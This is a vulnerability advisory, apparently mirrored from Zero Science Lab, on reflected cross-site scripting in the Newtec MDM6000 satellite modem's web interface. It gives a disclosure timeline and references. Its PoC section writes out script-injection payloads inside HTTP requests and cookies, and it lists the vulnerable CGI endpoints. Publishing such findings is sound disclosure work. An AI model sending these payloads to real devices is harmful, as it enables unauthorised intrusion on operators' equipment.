Lucene search

K
zeroscienceGjoko KrsticZSL-2016-5359
HistoryAug 21, 2016 - 12:00 a.m.

Newtec Satellite Modem MDM6000 2.2.5 Cross-Site Scripting Vulnerability

2016-08-2100:00:00
Gjoko Krstic
zeroscience.mk
289

6.7 Medium

AI Score

Confidence

High

Title: Newtec Satellite Modem MDM6000 2.2.5 Cross-Site Scripting Vulnerability
Advisory ID: ZSL-2016-5359
Type: Local/Remote
Impact: Cross-Site Scripting
Risk: (3/5)
Release Date: 21.08.2016

Summary

The MDM6000 modem is typically installed at both ends of a point-to-point satellite link or at the remote sites of a star network. The unit can work as a modulator, demodulator or modem depending on the network configuration and integrates seamlessly with terrestrial IP networks and equipment. The modem is in full compliance with the DVB-S2 and DVB-S2X standards to achieve barrier-breaking efficiency at maximum service availability.

Description

Newtec Satellite Modem MDM6000 suffers from multiple reflected cross-site scripting vulnerabilities when input passed via several parameters to several scripts is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user’s browser session in context of an affected site.

Vendor

Newtec Cy N.V. - <http://www.newtec.eu>

Affected Version

2.2.5.67852
2.2.4.64193
1.3.8.56435

Tested On

lighttpd/1.4.28

Vendor Status

[20.06.2016] Vulnerability discovered.
[20.06.2016] Vendor contacted.
[20.06.2016] Vendor replies asking more details.
[24.06.2016] Sent details to vendor.
[29.06.2016] Working with the vendor.
[08.07.2016] Asked vendor for status update.
[08.08.2016] No reply from the vendor.
[21.08.2016] Public security advisory released.

PoC

newtec_xss.txt

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <https://customersupport.newtec.eu/Service/WebObjects/Service.woa/wa/LookupRequest?requestId=121809&gt;
[2] <https://packetstormsecurity.com/files/138459&gt;
[3] <https://cxsecurity.com/issue/WLB-2016080207&gt;
[4] <https://exchange.xforce.ibmcloud.com/vulnerabilities/116245&gt;

Changelog

[21.08.2016] - Initial release
[31.08.2016] - Added reference [2], [3] and [4]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: [email protected]

<html><body><p>Newtec Satellite Modem MDM6000 2.2.5 Cross-Site Scripting Vulnerability


Vendor: Newtec Cy N.V.
Product web page: http://www.newtec.eu
Affected version: 2.2.5.67852
                  2.2.4.64193
                  1.3.8.56435

Summary: The MDM6000 modem is typically installed at both ends
of a point-to-point satellite link or at the remote sites of a
star network. The unit can work as a modulator, demodulator or
modem depending on the network configuration and integrates
seamlessly with terrestrial IP networks and equipment. The modem
is in full compliance with the DVB-S2 and DVB-S2X standards to
achieve barrier-breaking efficiency at maximum service availability.

Desc: Newtec Satellite Modem MDM6000 suffers from multiple reflected
cross-site scripting vulnerabilities when input passed via several
parameters to several scripts is not properly sanitized before being
returned to the user. This can be exploited to execute arbitrary HTML
and script code in a user's browser session in context of an affected
site.

Tested on: lighttpd/1.4.28


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5359
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5359.php


20.06.2016

--


Payload: "&gt;<script>alert(1)</script>

Params: value, args, URI.
Cookie: ext-pogui-tasks, token.

PoCs:

GET /cgi-bin/pogui/view/validate/GuiTreeViewDecapsulationTSDecapsulation/Decapsulation-TSDecapsulation-DecapsulationPIDs/123?value="&gt;<script>alert(1)</script> HTTP/1.1
GET /cgi-bin/pogui/view/execute/tasks/calibration-nonlinearequalink-manual?args="&gt;<script>alert(2)</script> HTTP/1.1
POST /cgi-bin/pogui/auth/login"&gt;<script>alert(3)</script> HTTP/1.1
Cookie: token=expert-8816866; ext-pogui-tasks=o%3a"&gt;<script>alert(4)</script>; ext-pogui-alarms=o%3A
Cookie: token=expert-8816866"&gt;<script>alert(5)</script>; ext-pogui-tasks=o%3A; ext-pogui-alarms=o%3A


Can be triggered in:

/cgi-bin/pogui/auth/login
/cgi-bin/pogui/view/alarms
/cgi-bin/pogui/view/create/GuiTreeViewDecapsulationTSDecapsulation/Decapsulation-TSDecapsulation-DecapsulationPIDs
/cgi-bin/pogui/view/execute/alarms/clearAllAlarmCounters
/cgi-bin/pogui/view/execute/tasks/calibration-nonlinearequalink-manual
/cgi-bin/pogui/view/GuiLedView
/cgi-bin/pogui/view/GuiSynopticViewAUPCControllerDetailedView
/cgi-bin/pogui/view/GuiTreeViewDeviceSetupControlPlaneEncapsulatorConfiguration
/cgi-bin/pogui/view/synoptic
/cgi-bin/pogui/view/update/GuiTreeViewEncapsulationTestTrafficGeneratorConfiguration/TestTrafficGenerator-Configuration-Enable
/cgi-bin/pogui/view/update/GuiTreeViewDecapsulationTSDecapsulation/Decapsulation-TSDecapsulation-DecapsulationPIDs/123
/cgi-bin/pogui/view/validate/GuiTreeViewDecapsulationTSDecapsulation/Decapsulation-TSDecapsulation-DecapsulationPIDs
/cgi-bin/pogui/view/validate/GuiTreeViewDecapsulationTSDecapsulation/Decapsulation-TSDecapsulation-DecapsulationPIDs/123

</p></body></html>

6.7 Medium

AI Score

Confidence

High